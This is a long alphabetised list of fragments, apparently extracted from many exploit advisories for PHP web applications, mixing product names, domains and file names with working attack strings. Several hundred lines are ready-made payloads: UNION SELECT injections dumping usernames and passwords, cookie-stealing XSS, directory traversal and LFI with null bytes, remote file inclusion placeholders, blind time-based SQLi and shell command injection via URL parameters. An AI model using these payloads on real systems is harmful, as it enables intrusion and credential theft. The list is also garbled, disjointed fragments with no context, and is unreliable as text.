phpBB2
phpBB-2.0.19
phpbb22-mutant
phpbb3.smika.net
PHPbbBook
phpbbbook.syssap.nl
phpbbbtr.avi.html (1.06 mb)
phpbbfm
phpbbfm.net
phpBBfolder
phpbbmemorydump.rar
{phpBB path}
phpBB phpbb 2\n";
phpbbsession.c
phpbbtweaked
phpbg.sourceforge.net
php-bin
phpblaster.org".
~phpbluedragon3.0.0
phpbluedragon.net
phpbluedragon.pl
phpbms.org
php-box
phpbp_users
phpbridges
phpbt.sourceforge.net
phpbuddies
php-captcha.php
phpcareers
phpcart.php?action=add&id=1002&descr=Mobile%20Phone&price=0&postage=&quantity=100 
phpcdb
phpcharts
PHP-Charts-1.0-Code-Execution.html
php_chat_module_for123_flash_chat_4902.html
phpcityportal
phpclass.asp
phpclassifieds
phpClassifieds v7.5
php-cms-project
phpcms_th
phpcms-v9-blind-sql-injection.html
phpcodecabinet_directory
phpcodegenie
PHP-Code-Injection.htm
phpcodeur.net
phpcoin
phpcollegeex.sourceforge.net
PhpCommander
phpcommunity2
phpcompet.free.fr
php_content
_php-core
phpcounter
[php-counter]
[phpcounter.1.3.2]
phpcounter.sourceforge.net
php-crawler
php.creabook.1359.html				|
php\?created
phpCrop
phpcrs
phpdaily.self-reliance.be
phpDatingClub
phpdbdesigner
phpdecoder
php.deeserver.net
phpdemo
phpdenora
phpDenora
phpdev5
phpdig
phpdirector
phpdirectorgameedition
PHPDirector-Game-Edition_7.html
phpdj
phpDocumentor
phpdocwriter
phpdocwriter.sourceforge.net
phpdownloadlinks_0.6
phpdr
phpdug
phpdynasite
phpeasydata-1.5.4
phpeasydata-free-edition
phpeasydownloader
phpecard
<?php echo $blog->domain.$blog->path
PHPEmailManager
PHP-eMail-Manager-30652.html
phpenpals
phpeventcalendar
phpEventCalendar
&phpEx=
PHP-FAQ-Script-Knowledgebase-Script.htm
phpFFFF.tmp%00
phpffl
phpffl_webfiles
phpfidonode
php_files
php-filesystem-attack-vectors-take-two
phpfirstpost
phpfn
phpfootball
PHPfootball
phpfootball.sourceforge.net
phpforge
phpforge3
phpforume
phpforums.net
phpfreebb
phpfreebb.sourceforge.net
php-fusion
phpfusion70205
php-fusion admin password 3','31337','HACKED')
php-fusion.co.uk
phpfusion.marcusg.de
phpg
phpgallery
phpgedview
[phpGedView-directory]
phpgedview_folder
php-generics
phpgiftreg
php-gradebook
phpGradeBook
phpgraphy
phpgraphy-0.9.7
phpgraphy.sourceforge.net
phpgroupware
[phpgroupware_directory]
[phpGroupWare_path]
phpgwapi
phphelpagent
PhpHostBot.php
PHPhotoalbum
phphq.net
phphtml
php.html.it
phpi
phpical_221_incl_xpl.html), that isn't still patched!
phpicalendar
phpicalendar.net
php-ids.org
[PHPIDS_path]
*.php?id=[SQL
php_image_gallery
phpinc
phpindexpage
phpindexpage-1.0.1.tgz              #
<?phpinfo();
phpinfoboard
phpinfo HTTP
phpinfo.php
phpinfo.php 
phpinfo.php                                                      #
phpinfo.php";
phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);<
phpinfo.php?php=
php.ini
phpinv
php-inventory
[phpinv_path]
phpip
phpipnmonitor
phpireport
phpireport%20v1.0%20alpha%20revision%2025.rar
phpix
phpizabi
php-java-bridge.sourceforge.net");
php-java-bridge.sourceforge.net --path=examples --dir=
phpjobschedule_PATH
phpjobscheduler.php?installed_config_file=[Evil Script]
phpjokescript.asp
php-jokesite_v2
phpjournaler
phpkit
phpkit.de
phpkit.de                                                  |\n";
phplabware
php-lance
phpld
phpldapadmin
phpldapadmin.git.sourceforge.net
phpldapadmin;h=76e6dad
phpldapadmin.sourceforge.net
php-link-directory-software.php
PhpLinkExchange
PhpLinkExchange.php
php-link-manager.php
phplinks
phpLinks_path
phplist
phpliteadmin
phpliteradmin
phplive
phplive   
phplive";
phplive	
phplivehelper
phplizardo.2gb.fr
phplogo.jpg
php.lulieblog.2138.html
phpmailer
phpmanga.sourceforge.net
phpmdj
phpmesfilms_1.8
phpmesfilms.dyndns.org
phpmip
phpmoneybooks
phpMoneyBooks102
phpmotion
php-multipartform-data-denial-of-service
phpmur ]
phpmyadmin
phpMyAdmin
phpMyAdmin-2.5.7
phpMyAdmin-2.6.4-pl1
phpMyAdmin-3.3.9.2");
phpMyAdmin-3.3.9.2<br
phpmyadmin-3x-multiple-remote-code.html
phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=
[phpMyAdmin_directory]
phpMyAdmin" % program
phpmybackup
phpMyBackupPro
phpmybittorrent
phpmychat
phpmychat_0145_xpl.html
phpMyChat-0.15.0-dev20050206.tgz?download
phpmyclub
phpmycms
phpMyConference
phpmydesk
phpmydump.php
PhpMyExplorer
phpmyfamily
phpmyfaq
phpmygallery
phpmygallery.kapierich.net
phpmyinventory
phpmylogon
PhpMyLogon
PhpMyLogon%202
phpmynewsletter
phpmyportal.info
phpmyprofiler
phpMyRealty.v1.0.7.PHP-rs.rar
php-myrecipes
phpMyRecipes.png
phpmyring
phpmyring.sourceforge.net
phpmysport
phpmysport.sourceforge.net
phpmywebmin
phpnagios
php.net
phpnetartigos
phpns-sql-injection.html
phpnuke
[php-nuke]
php-nuke
PHP-Nuke
phpnuke441a
php-nuke-7.9
phpNukeDirectory
phpnuke&file=conf
phpnuke.org
[phpnuke_path]&file=[file]
phpnuke.pl
phpnuke-release-8.2.4
phpnukesite
phpocs
[phpocs-0.1-beta3]
phpocs.sourceforge.net
php-ofc-library
[phpof_path]
[phpOnDirectory_path]
phpope
phportfolio
phpowllib
phpp
php pages
phppaleo
phppc
phppcl
phpPgAdmin
phppgadmin.sourceforge.net
phpPhotoAlbum
php.php
php.php");
php.phpgiggle.565.html =>      Tlcharger
php.phpmyphorum.1104.html#        
phpping
php-ping.php?count=1+%26+cat%20
php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21
phpplanner
phpplanner.sourceforge.net
php-pm
phppoll
php-post.co.uk
phpPowerCards
php.power-phlogger.211.html #
phpprofiles
phpproxima
php.psywerx.net
php.pwsphp.1517.html
phpq
phpquickgallery
phpquiz
phpQuiz
phpRaid
phpRaid_path
phpraincheck
phprank
phprealty
[phprealty-path]
phprecipebook
phprecipebook.sourceforge.net
phpress
php-reverse-shell
php-revista
php-revista.sourceforge.org
phprint.php?module=Activities&action=--%3E%3C
phprisk.org
phprofession
phprojekt
[PHProjekt_path]
phpsane
phpscheduleit.sourceforge.net
phpscribe
phpscript
phpscriptat-p12h4s5-PHP-Forum-Hoster-Por.html
phpscriptat-p25h4s5-PHP-Paid-4-Mail-Scri.html
php-scripte-5
phpscripts
php_scripts
php-scripts
phpservermon
PHPSESSID=([^;]*);
phpsetimon
phpshell
phpshell?
phpshell?&
phpshell?& 
PHPSHELL?&");
phpshell%0d%0a" &>
phpshell.gif?&cmd=
phpshell.gif?&cmd='
phpshell.php
phpshell.php"
phpShell.php
phpshell.php.off                                                           #
phpshop
phpshop-0.8.1
phpshop 2.0
phpshop-dist.cfg * After download
phpshowtime.kybernetika.de
php_simple_news
phpsimpleshop
phpsitebackup
phpSiteBackup-0.1.tgz
phpSiteBackup.rar
phpsitelock
phpsmartcom
php-software
phpspezial.de
php-src
php_stats_0191b_sql.html or
php_stats_0191b_sql_ii.html
phpstore.info
php.sturgeon-upload.2012.html
php-sugar.net
phpsws
phpsws-0.99.tgz?download
[phpSysInfo]
phptax
phptax.sourceforge.net
PHPTB
[phpTest]
phptest.php
phpthumb
phpThumb.php?src=..
phpThumb.php?src=[Local File]
phpThumb.php?w=800&src=..
phpthumb.sourceforge.net
phpticketsystem
phptonuke.php?filnavn=<script>alert(document.cookie)<
PHP_Top_5
phpTrafficA
phptraverse
phptree
[phptree_path]
php.tribisur-20.1211.html
php-tv-portal.html                                             ¦       ¦                                       ¦
php\?u=(\d+)
phpunity-newsmanager
phpunity.newsmanager
phpunity.newsmanager.shtml
phpunity-postcard.php?plgallery_epost=1&gallery_path=[shell]?  #
phpuploader.php                               #
php-uploader-v5
php-uploader-v5<
php-video-script
phpvid-the-video-sharing-software.html
phpvidz
phpvidz_0.9.5
phpvolunteer
phpwcms
phpwcms.php?do=files&f=0">
phpwcms_template
phpweather
phpweb
phpwebeditor
phpwebfilemgr
phpwebframe
PhpWebFtp
phpwebgallery
phpwebgallery_dir
phpwebnews-mysql
PHPWebquest\n";
phpwebquest.org
php.web-server-creator.1082.html                                                                                                                            
phpwebsite
phpwebthings
phpwebthings_1_5_2
phpwebthings.nl                                                                     # 
****.php?we_objectID=21
****.php?we_objectID=21 1
phpXD
php.xforum.1188.html
phpXplorer
phpyabs
phreebooks
phreedom
[phsBlog_path]
ph_settings.php?id=-1' OR 1=1--%20
phxeventmanager
physics.ramapo.edu
pi1
picadownload.php?imgname=..
pica-photo-gallery
picaPhotosResize.php
picaPhotosResize.php");
Picasa2Gallery-1.2.8
picEditor.php?img_dir=http%3A%2F%2Fwww.google.com&CURRENT_PIC[filename]=
picEditor.php?img_dir=include
picEditor.php" method="post">
picme_210
picoflat.altervista.org
pico.no
pics
picsize.php?src=MALICIOUS_URL
pics.php?sid=-1+union+select+database(),2,3,4,5,6,7,8,version(),10,11,12--
picstorage
picture
picture_category.php?id=-1%20union%20select%201,aid,3,4,5,6,7,8,apass,10,11,12%20from%20admin
picture_category.php?id=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B<
picturegallery.php?action=shownext&bildid=[SQL-STATEMENT]
picturelib.php?cat=[rfi]
[picture number]_shell.php 
picture.php?1sweet[SQLi]&action=rate=0
picture.php?cat=1&image_id=1
picture.php?cat=1&image_id=1"
picture.php?cat=1&image_id=1\"
picture.php?cat=3&image_id=76+and+substring(@@version,1,1)=5
picture.php?cat=best_rated&image_id=[SQL] 
picture.php?cat=[Real id]&image_id=[Real id]+and+substring(@@version,1,1)=5
picture.php?file=[FILE]
picture.php?id=..
picture.php?id_adh=0+and+1=0+union+select+group_concat(table_name,char(10)),null+from+information_schema.tables
picture.php?id_adh=0+and+1=0+union+select+@@version,null 
picture.php?image_id=-1+union+select+1,concat_ws(0x3a3a,username,password)+from+users
picture.php?img=..
picture.php?pid=1[SQL]
picture.rar
pictures
pictures.php?dir=[SQL] 
pie.ekkaia.org
[pie installation]
/?pilih=forum&mod=yes&aksi=komentar&id=-9%20union%20select%201,user,id,4,email,password%20from%20user
/?pilih=hal&id=-9%20UNION%20SELECT%200,user,password%20from%20user
/?pilih=lihat&id=-9%20UNION%20SELECT%20null,user,password,null,null,null,null,null%20from%20user
', $pilih) or !file_exists("$pilih.php")){
/?pilih=pesan&id=-9%20UNION%20SELECT%20null,null,null,concat(user,0x3a,password),null,null,null,null%20from%20user
*&pilih=search"; 
/?pilih=teman&id=-9%20UNION%20SELECT%20null,concat(user,0x3a,password),null,null,null,null,null,null%20from%20user
pindorama
p_inf.php?page=[SQL Injection]
ping
ping.php?ping=ok" -d "ip_dominio=192.168.1.1 -n 1 %26 dir"
p_ins.php?MGR=[evilscript] |
PishBini
pithcms
PITS
pivot
~pivot_1406_full
' . $Pivot_Vars['HTTP_HOST'] . $Pivot_Vars['SCRIPT_NAME'];
piwigo
piwigo-2.0.6
 - Piwigo is a photo gallery software for the web, built by an active community of users and developers.
piwigo.org
pixel3
pixel.php"
pixel.php -e
pixel.php?site=
pixelpost
pixelpost-171-security-patch
pixelpost.php
pixie
Pixie-CMS-Multiple-Vulnerabilities.
/?pixie_user=x',log_important=IF({CONDITION},SLEEP(5),NULL),log_id='1234
pixie_v1.04
pixlie.php?root=..
$pject");
pkg_mgr_install.php?mode=installedinfo&pkg=x%22;alert(document.cookie);this.document.forms[0].output.value+=%22
pkgs
pkp.sfu.ca
  (PL)
placelist.php?level=1[Evil_Query]
placelist.php?level=1&parent[0]=[Evil_Query]
placelist.php?level=2&parent[0]=&parent[1]=[Evil_Query]
_plain
plaincart
plain","Content-type": "application
plain.footer.php?mainnav=
planet1_1
planetgallery
planning.class.php?path_om=[Shell]
planning.class.php?path_om[Shell]
planning.php
plans.class.php?path_om=[Shell]
plateforme
platform
platformdownload.php?group_id=149865
platformdownload.php?group_id=174729
platformdownload.php?group_id=178414
platformdownload.php?group_id=183624    
platformdownload.php?group_id=186000
platformdownload.php?group_id=204083
platformdownload.php?group_id=206982     #####
platformdownload.php?group_id=217673
platformdownload.php?group_id=59168
platformdownload.php?group_id=86090
platinumadmin.html
playcode.php?l=..
playcode.php?lng=..
[player]
player.php?name="+nameforfish
player.php?name=[valid_name]'+AND+1=0%23 --> FALSE
player.php?name=[valid_name]'+and+1=1%23 --> TRUE
player.php?steamid='
playlist-controller.php?id=32-0%27
playlist-controller.php?pp_playlist_id=-1') UNION ALL SELECT NULL,NULL,@@version--%20
playlist.php?post_gallery=-1' UNION ALL SELECT 1,2,3,4,5,database(),current_user(),8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23--%20
playlist.php?videoid= [INJECT HERE]
play.php?gid=null and 1=2 UNION SELECT
play.php?id=-25union select 1,2,3,login,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users
play.php?id=-96969+union+select+0x28284d722e53514c2929,concat(username,0x3a3a3a3a3a,password),3,4,email,6+from+users
play.php?id={SQLi}
play.php\?vid=(.*)\"
playsms
playsms.org
playVideo.php?product_id= [SQLi]
plecms
plesk-10.2.0.html
plesk-10.2.0-site-editor.html
plesk-10.2.0-site-editor.xml
plesk-cover-1.jpg
plesk-reports
plesk-site-editor-sqli-1-1.jpg
plesk-small-biz-10.2.0-sqli-2-1.jpg
plexinium.net
plexum.php?section=webstats&page=hits&startpos=15&maxrec=457&pagesize=[SQL]
plexum.php?section=webstats&page=hits&startpos=450&maxrec=[SQL]
plexum.php?section=webstats&page=hits&startpos=[SQL]
pligg
Pligg
pligg_1.1.2
pligg_auto_voter.html
Pligg_Beta_9.9.0
pligg-cms
pligg-cms-1-1-4-released
pligg     \n";
pliki
plog-admin
plogger
plog-options.php" method="post">
pluck-4_5_1
plucky
plucky.heliohost.org
plugin
_plugin
plug-in
PLUGINADMIN.php?GLOBALS[DIR_LIBS]=
plugin_admin.php?_settings[pluginpath]=[SHELL]
PluginController.php
PluginController.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
plug.inc.php?path=[                 #
plugin-dir
plugings
plugin-index.php
plugin-index.php?action=disable&package=%3Cscript%3Ealert%28document.cookie%29;%3C
plugin-newsletter
plugin.php?doc_root=[vuln]
plugin.php?identifier=family&module=family&action=view&fmid=11+and+1=2+unIon+selecT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31,32,33 from cdb_members--
plugin.php?identifier=family&module=family&action=view&fmid=1+and+1=2+unIon+selecT+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31 from cdb_members--
plugin.php?identifier=family&module=family&action=view&fmid=6+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,group_concat(uid,0x3a,username,0x3a,password),19,20,21,22,23,24,25,26,27,28,29,30,31 from bbs_members--
plugin.php?page=contact&file=[LFI]%00
plugin.php?page=[LFi]
plugin.php?page=phpbb3    |
plugin.php?page=phpbb3     |
plugin.php?page=your_account&mode=viewprofile&username=-1%27+UNION+ALL+SELECT+1,user(),3,version(),database(),user(),7,8,current_user(),10,11,version(),13,14,15,version(),17,version(),user(),20,21,22%23
plugin.php?page=your_account&mode=viewprofile&username=-1%27+UNION+ALL+SELECT+1,username,3,concat(username,0x3A3A3A,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+FROM+cms_users+WHERE+uid=1%23
plugin.php?page=your_account.php&mode=passlost
plugin.php?page=your_account.php&mode=passlost";
plugin.php?page=your_account.php&mode=passlost HTTP
plugin.php?page=your_account.php&mode=register
plugin-preferences.php
plugin-preferences.php?group=..
plugins
Plugins
[Plugins]
plugins.e107.org
plugin-settings.php
plugin-settings.php?group=..
plugin-settings.php?group=%3Cscript%3Ealert%28document.cookie%29;%3C
plugins_filemanager.php
plug-ins.inc.php
plugins.php?edit&plugin=1"
plugins.php?message=<script>alert(document.cookie);<
plugins.php?page=solvemedia
plugins.php?p=tags&forumid=0&tagname=-1'+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1
plugins.svn.wordpress.org
plug.php?e=events&f=old&c=all' [SQL]
plug.php?e=events&f=old&c=all' union select 1,2,3,4,5,version(),7,8,9,0,1,2,3
plug.php?e=topitems';AND%20THIS=LAME 
plugspace
[plugspace]
plume
plumecms
plume-cms.net
plupload
plus
pluserdata
plusxl.htm                                                  #
pluxml0.3.1
plxadtrader
plxadtrader                              
pm
PMA
pman
PMASA-2009-3.php
PMASA-2009-3.php' ],
PMASA-2012-5.php'] ],
pmbt
pmd-arcade
pmf_auth=([^;]*);
pmlite.php' method="post">
pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5
pmm-cms
pmm-cms.sourceforge.net
'.$pm_mybb.'<
pmos
pm.php
pm.php?gfcommon=[Shell]
pm.php?sub=do&submit=Delete&delete$msg=$sql");
pm.php?sub=folder&name=inbox");
pm.php?sub=newpm",$content);
pm.php?sub=newpm&uid=[code]
pmpshow.php?num=<script>JavaScript:alert(document.cookie);<
pmscript.php?with=..
PmWiki
pnadmin
pnc
PNC
pnencyclopedia
p_new_password.tpl.php?templatePath=[Evil_Script]
p-news.php?pn_lang=[shell]
pnews.sourceforge.net
pn-formexpress
PNphpBB2
pns-webdesktop
pnTemp
pn_uid=2
pn_users
pobierz13.html
pobierz205.html
pobierz-2232.html
pobierz274.html
pobierz.php?id=58 ;				 			         
pobierz.php?id=602
poc
PoC
POC2009-ShockingNewsInPHPExploitation.pdf
pocategories.php?stranica=categories&categori=[SQL]
pocategories.php?stranica=[SQL]
PoC-FC213.c
pocfile.php
PoC-iScriptsSW22.c *
poc.php
poc.php).
pocs
poc.salvatorefresta.net
PoC.swf
podcast.asp
podcastgen.sourceforge.net
podcast.php?id=[SQL]
podhawk
podhawk_1_85
podhawk.sourceforge.net
poems
poems.php?division=diwan&action=view&offset=25&id=[sql]
/?p=official
pogodny
pointcomma
pointter-php-content-management-system-unauthorized-privilege-escalation-cve-2010-4332
pointter-php-micro-blogging-social-network-unauthorized-privilege-escalation-cve-2010-4333
pokaz_podkat.php?idkat=10&order1=1&str=' (SQL)
pokeradmin
pokerleague
policy
policy.html
_policy_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
policy.php?sec_id=[BLIND SQLi]           0
poll
poll97.mdb
poll_add.php">
pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20u 
pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM %20authors
[poll_dir]
pollencms
poll.inc
poll.inc.php?lang_path=[cmd_url]
polling.php
poll_logs.php?qid=-1 UNION ALL SELECT NULL,CONCAT(CHAR(96),@@version,CHAR(96)),NULL,NULL,NULL,NULL-- ".replace(" ", "%20")
poll.mdb
poll.php
poll.php?file_newsportal=[evil_scripts]
poll.php?GlobalSettings[templatesDirectory]=evill
poll.php?GlobalSettings[templatesDirectory]=[evil_script]
poll.php?path[cb]=[evil_scripts]
poll.php?poll_id=1'+union+select+1,convert(concat_ws(0x3a3a,user_name,user_password)+using+latin1),1,1,1,1,1,1,1,1+from+seportal_users+limit+1,1
poll.php?sid=-1+union+all+select+1--
poll.php?skin=..
poll.php?skin=[Local File]%00
poll-plugin
poll_result.php?po_id=177&skin_dir=..
PollResults.php?answer_id=32&AddVote=[SQL]
PollResults.php?answer_id=[SQL]
poll_results.php?id=-1+union+select+1,concat(version(),0x3e,user())--
polls
poll_script
poll_sm.php?is_phppc_included=1&relativer_pfad=ftp:
polls.php?action=delete&pollid=1&returnto=><script>alert(0)<
polls.php?action=delete&pollid=><script>alert(123);<
polls.php?action=delete&returnto=><script>alert(123);<
polls.php?action=delete&sure=1&pollid=waraxe
polls.php?action=newpoll&tid=1&polloptions='[SQL INJECTION]
polls.php?action=newpoll&tid='[sql_query]
polls.php?id=
polls_script.html
poll_summary.php?rootdp=zZz&admin_home=
polskihacking.pl
polypager
polypager.nicolashoening.de
[polypager_path]
ponente
/?p=[ONE OF THE EXISITING FILES]-[EXISITING ACTION IN
PonyBlaze
pop_accounts.php?plan_id=35&domain=[SQL]
pop_accounts.php?plan_id=[SQL]
poppawid.sourceforge.net
popp.config.loader.inc.php?
popper.ractive.ch
pop.php?base=[shell]
pop.php?t=[SQLi]
popup
popup_bitem.php' % ip
popupDownload.asp?noProduit=63&langue=1 ]
popup_finduser.php?vsDragonRootPath=[evil_scripts]
popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
PopUpNews
popupnewsitem
popup.php?action=results&poll_ident=1 [SQL Me]
popup.php?action=results&poll_ident="><script>alert(document.cookie);<
popup.php?action=results&poll_ident="><script>alert("hola vengo a flotar");<
popup.php?dstfrm=form_scenario&dstfld1=application&srctbl=applications&srcfld1=name&only_hostid=-1))%20union%20select%201,group_concat(surname,0x2f,passwd)%20from%20users%23
popup.php?get_popUpResource= [inj3ct0r sh3ll] <-- RFI
Popup.php?GLOBALS[sugarEntry]=1&theme=..
popup.php?h=&#039;><script>alert(10)<
popup.php?img=imagefolder1%2Fkoalalikefather%2Ejpg&w=215&h=162&t=hacked-by-indoushka<
popup.php?img="><script>alert(document.cookie)<
popup.php?page=..
popup.php?popUpResource=[LFI]%00
popup.php?read=..
popup.php?_REQUEST[read]=[EV!L]
popup.php?sbpic_id=-9999+union+all+select+1,2,3,version(),5,6,7,8,9,10,11--
popup.php?sbpic_id=[SQLi]
popup.php?t=&#039;><script>alert(10)<
popup.php?w=&#039;><script>alert(10)<
popupproduct.php?id=1337+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12
popupproduct.php?id=[uR eViLNeSS HeRe]
popups
pop_ups
popups.edit.php?popupid=[SQL]
popup_shipping
popup_slideshow.php?gallerytheme= [inj3ct0r shell]
popup_slideshow.php?gallerytheme= [LFI]%00
popup_slideshow.php?language= [LFI]%00
PopupSugar.php?GLOBALS[sugarEntry]=1&theme=..
popuptest.php?text=<script>alert(123);<
po_receive_items.php
po_receive_items.php?PONumber=
port
portable.class.php?path_om[Shell]
portable-phpmyadmin
portailphp
portail-web-php
portal
Portal
portal_block.php?phpbb_root_path=[evilcode]
portal.kleophatra.org
portal.kooijman-design.nl
portal.php
portal.php 
portal.php?action=do_login&username='[sql_query]
portal.php?article=0&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C
portal.php?article='%22%3E%3Cscript%3Ealert(document.cookie)%3C
portal.php?id=54&a=viewfeature&featureid=99999
portals
portalxp
portalxp%20-%20teacher%20edition
ported to PostNuke and Mambo Open Source by Kemas Yunus Antonius.
portel
portfolio
portfolio.asp
portfolio?controller=sections&view=item&id=71%20and%20substring%28@@version,1,1%29=5
portfolio?controller=sections&view=item&id=-71%20union%20all%20select%201,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
portfolio_genre.php?id=-67%20union%20select%201,2,@@version--
portfolio.php?cat_id=[SQL]
portfolio?view=item&id=-100%20union%20all%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
portfolio?view=item&id=100 and substring(@@version,1,1)=5
portix-cms-150-rc5-3005.html
portlist.php?portnum=<script>alert(document.cookie)<
portswigger.net
pos=0.html 
po_search.php
posh
post
post2shtml.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
postaffiliatepro
postaffiliatepro3
post_blog
[post_blog_path]
postcarden
postcardir
postcard.php?action=view&id=[Sql]
post-comment
postComment.php?path[cb]=[evil_scripts]
' . $post["facebook"] .'" TARGET=_BLANK><img src="'.$mybb->settings['bburl'].'
post_files
postguestbook
post-highlights
{$_POST['hostname']}
/?postid=1%20or%201=1 
*&post_id=2'&topic_id=2&viewmode=flat&order=0
*&post_id=2&topic_id=2&viewmode=flat&order=0
postie
postimage.org
posting_notes.php?mode=editpost&p=-99%20UNION%20SELECT%200,0,username,0,0,0,0,0,0%20FROM%20orionphpbb_users%20WHERE%20user_id=2
posting.php?templatefolder=[file]
postjob.php
post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0'&idString=3,5,4,1
post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11--&idString=3,5,4,1
postnuke
PostNuke
postnuke0726
PostNuke-0.760-RC4b
post.php
post.php";
post.php3?topic_id=999%20union%20select%201,2,3,4,5,6,7
post.php?action=edit&forum_id=2&thread_id=1&post_id=1" method="post">
post.php?action=edit&page=1&PID=1[SQL]
post.php?action=newthread&fid=[sql]
post.php?action=newthread&fid='[SQL]&poll=yes 
post.php?action=newthread&forum_id=2" method="post">
post.php?action=post&FID=1[SQL]
post.php?action=reply&tid=2517&repquote=[Sequel]
post.php?board=1&reply=999'% 20union%20select% 201,2,3,4,5, 6,7,8,9,10, 11,12,13,14, 15,16,17,18, 19
post.php?Category=Garage
post.php?Codebase=[Shell]
post.php?fil_config=[evil_scripts]
post.php?gfconfig=[Shell]
post.php?id=-1+UNION+ALL+SELECT+'<HTML><title>SPLOG <= 1.2 Beta--SHELL BY --Y3NH4CK3R--><
post.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9+from+square_settings--
post.php?id=-1+UNION+SELECT+1,user(),database(),version(),user(),database()%23
post.php?id=-9999'
post.php?id=[SQL Injection]
post.php?post=145&action=edit&message=1
post.php?post=43&action=edit
post.php?postid=-SQL Inj-
post.php?qb_path=[evil_scripts]
post.php?reply=%3Cscript%3Ealert(document.cookie);%3C
post.php?template= [inj3ct0r sh3ll]
post.php?topic=>"<br><iframe%20src=javascript:alert()><br>" 
postpost.php" method="post">
post_project.php
postreply.php?templatefolder=[file]
post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
postrev
posts
posts-images
".$_POST['site']."
posts.php?cmd=ls -la
posts.php?id=1'
postthread.php
postuploadcsv.php?gfcommon=[Shell]
POST_URL
Pouya.info
Pouya.Securitylab.ir
Pouya-Server.ir
powerpack_f.php?language=<script>alert()<
powerslave,id,10;,nodeid,,_language,uk.html
powerwd.net ##
powl
pown.it
poza.php
pp13
[ppa_path]
ppc
ppc-add-keywords.php?id=1+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users--
ppc-add-keywords.php?id=348+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users--
ppc-add-keywords.php?id= [ Exploit ]
ppc-banners
p><p class="Stile6">a script by rgod at <a href="http: 
ppc-new-image-ad.php
ppec
pphlogger
ppim
p><p><input
p-popupgallery.php?l=
pppblog
/?p=process_change_password&id=1"
/?p=productsList&sWord=%22%3E%3Cscript%3Ealert(document.cookie)%3C
ppSD
ppSD2
ppstorefront
/?p=Quick.Cart
/?p=Quick.Cms
pr0js
practico
practicos
pragmaMx_1.12.0
pragyan
Pragyan
prayers.php" id="ChangeSubmit">
prdownload.berlios.de
prdownloads.sourceforge.net
pre>
pre>"?>
pre%3E%3Cscript%3Ealert(4)%3C
preaspjobboard
preaspjobboard.asp
prebay
predefined_variables.php?blogpost=..
Predicate.php?bkpwp_plugin_path=Shl3?
predicted.lib.php
PredictionLeague
preedit
preexampro.asp
preferences
preferences.add-edit.php
preferences.personal.php?newid=[code]
preferences.php?from='"<
[prefix]info_admin--&showpage=10
[prefix]info_user--&showpage=10
".$prefix."user
[prefix_users]
{prefix}_users
pref.php?gfplugins=[Shell]
prefs.php?fbpassword="><script>alert(document.cookie)<
prefs.php?fbusername="><script>alert(document.cookie)<
prefs.php?save=1
","",preg_replace("
premod-shadow.info
prepend.php?blog_dc_path=ftp:
pre.php?gfcommon=[Shell]
preprojects
presentation.php?id=-1+union+select+1,2,password,4,5,login,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER--
PressArchive  =====>    2.1.2
prestart.php?pathtoconfig=attachments
prestudio
preview
preview.asp?template_id=-1 union select 1,'[%25menu%25]' as date_created,email%2b'<br>'%2bpassword,user.*,user.*,1,2,3,4,5 from [user] where email like '%25admin%25'
preview.inc.php?install_root=[Shell]
preview.php
preview.php )
preview.php?act=news&orderType=[CROSS SITE SCRIPTING]
preview.php?data=..
preview.php?file=1&x="><script>alert(document.cookie)<
preview.php?file=1&y="><script>alert(document.cookie)<
preview.php?file="><script>alert(document.cookie)<
preview.php?id=`14&p=`&search=[CROSS SITE SCRIPTING]
preview.php?id=-1+union+select+1,2,concat%28pass,0x3e,uname%29,4,5,6,7,8,9,10+from+layout_demo.users
preview.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C
preview.php?id=-2'+union+Select+1--%20-
preview.php?id=[SQL-INJECTION]
preview.php?p=[SQL-INJECTION]
preview.php?synTarget=[Lfi]%00
preview_post_completo.php?dir=Shell
previews.php?browse='.$exec);
preview_top.php?file=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
preview_top.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
preview_top.php?pathext=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
